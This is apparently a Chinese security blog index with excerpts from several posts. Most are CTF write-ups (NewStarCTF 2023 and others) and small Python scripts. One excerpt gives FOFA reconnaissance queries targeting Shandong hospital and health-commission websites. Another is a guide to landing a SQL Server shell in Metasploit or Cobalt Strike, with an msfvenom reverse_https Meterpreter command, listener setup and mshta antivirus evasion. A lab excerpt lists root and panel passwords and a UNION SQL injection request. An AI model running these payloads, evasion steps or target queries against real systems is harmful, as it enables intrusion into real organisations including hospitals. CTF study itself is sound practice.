shizhanzhongdeyixietips
fofa1234567891011121314151617181920country="CN"&&(title="医疗"||title="医院")&&city="山东"title="目标名称" && region="shandong" city="jinan"(title="医院" || title="医疗" || title="卫生健康"|| title="卫健委" || body="医疗")&& region="山东省" cert="目标域名或者证书关键字" && region="xx省" cert="医疗" && city="济南市"...
NewStarCTF2023公开赛道WEEK3
webInclude 🍐经典文件包含写shell,进行rce, 12345678910111213141516<?php error_reporting(0); if(isset($_GET['file'])) { $file = $_GET['file']; if(preg_match('/flag|log|session|filter|input|data/i', $file)) { die('hacker!'); } include($file.".php"); # Something in phpinfo.php! } else { highlight_file(__FILE__); ...
sqlserver上线csormsf
当我没拿到一个sqlserver的权限时,权限很小,且有waf的情况下,且只能透过web执行命令,上线到msf或者cs。 先看一下杀软 很多,还有国外的。 这里采用mshta免杀上线,参考文章https://www.zhihuifly.com/t/topic/2534 首先整个模板文件https://raw.githubusercontent.com/mdsecactivebreach/CACTUSTORCH/master/CACTUSTORCH.hta,在这个里, 然后使用cs 或者msf生成一个raw 文件 msfvenom -a x86 -p windows/meterpreter/reverse_https LHOST=10.211.55.2 LPORT=3333 -f raw -o payload.bin cs attacks 这里注意是32位的 然后cat payload.bin | base64 -w 0 把得到的内容写进模板里 然后起一个python服务器即可, msf的要起监听 use exploit/multi/handler payload...
cfs
root密码:teamssix.com 此主机的IP地址:192.168.1.11192.168.22.11 宝塔后台登陆地址及密码:地址:http://192.168.1.11:8888/a768f109/账号:eaj3yhsl密码:41bb8fee root密码:teamssix.com 此主机的IP地址:192.168.22.22192.168.33.22 宝塔后台登陆地址及密码:地址:http://192.168.22.22:8888/2cc52ec0/账号:xdynr37d密码:123qwe.. GET /index.php?r=vul&keyword=1’ union%20select%20database(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39–%20123http://192.168.22.129/index.php?r=vul&keyword=1' union...
NewStarCTF2023公开赛道WEEK2
NewStarCTF 2023 公开赛道 WEEK2REVERSEWEEK2|REVERSE PZthon 下载文件,看起来像是py文件,py文件的话拖ida是不行的,至于为什么不行,我也不知道,大佬说的, 拖到ida里,也不行,太多东西了。 https://github.com/extremecoders-re/pyinstxtractor 可以使用这个python exe 反编译工具进行反编译, python3 .\pyinstxtractor.py...
谋集团ctf
压缩包大师很简单的压缩包套娃,密码是压缩包的密码python脚本whindows,但是解压很慢 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139import zipfileimport osimport py7zrimport rarfile#a = py7zr.SevenZipFile(r'e:\test.7z','r')count=0 # now =...
NewStarCTF 2023 公开赛道 WEEK1
NewStarCTF 2023 公开赛道 WEEK1webWEEK1|WEB 泄漏的秘密http://cd98ca4d-7c72-4499-9cb1-010764aa19de.node4.buuoj.cn:81/robots.txt http://cd98ca4d-7c72-4499-9cb1-010764aa19de.node4.buuoj.cn:81/www.zipPART ONE: flag{r0bots_1s_s0_us3ful$PART_TWO = “_4nd_www.zip_1s_s0_d4ng3rous}"; WEEK1|WEB Begin of Upload前端拦截 WEEK1|WEB Begin of HTTPhttp://node4.buuoj.cn:29356/?ctf=1base64_decode(bjN3c3Q0ckNURjIwMjNnMDAwMDBk改一下cookie WEEK1|WEB...
python自动点击小脚本
1234567891011121314151617181920212223242526272829import osimport timeimport pyautogui as pagtry: while True: print("Press Ctrl-C to end") screenWidth, screenHeight = pag.size() #获取屏幕的尺寸 print(screenWidth,screenHeight) x,y = pag.position() #获取当前鼠标的位置 posStr = "Position:" + str(x).rjust(4)+','+str(y).rjust(4) print(posStr) time.sleep(0.2) os.system('cls') #清楚屏幕except KeyboardInterrupt: ...
2023longjianbeiwp
没了tcp.flags.syn==1 and tcp.flags.ack==1 1234567891011121314151617181920212223242526 from Crypto.Cipher import AESimport zlibkey = b'748007e861908c03'hex_string = 'b5c1fadbb7e28da08572486d8e6933a84c5144463f178b352c5bda71cff4e8ffe919f0f115a528ebfc4a79b03aea0e31cb22d460ada998c7657d4d0f1be71ffa'byte_data = bytes.fromhex(hex_string) cipher = AES.new(key, AES.MODE_ECB)decrypted_data = cipher.decrypt(byte_data) s = zlib.decompress(decrypted_data,16 + zlib.MAX_WBITS)sa=...
